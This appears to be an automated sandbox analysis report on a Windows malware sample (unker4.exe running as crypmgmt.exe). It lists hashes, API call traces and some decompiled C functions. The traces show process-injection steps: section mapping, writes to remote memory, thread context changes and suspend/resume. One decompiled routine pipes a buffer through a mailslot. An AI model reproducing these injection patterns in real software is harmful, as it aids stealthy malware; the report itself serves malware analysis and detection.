    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 57932

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:0520E2BE92296DE286739115ACA14892
Total matches:34
Initial Analysis Report:Open
Initial sample Analysis ID:57932
Initial sample SHA 256:D4883169ADA9F2D88BB36D2A05634A56C26DF3CBEEDF9D8A2DA073CDB049F46D
Initial sample name:unker4.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
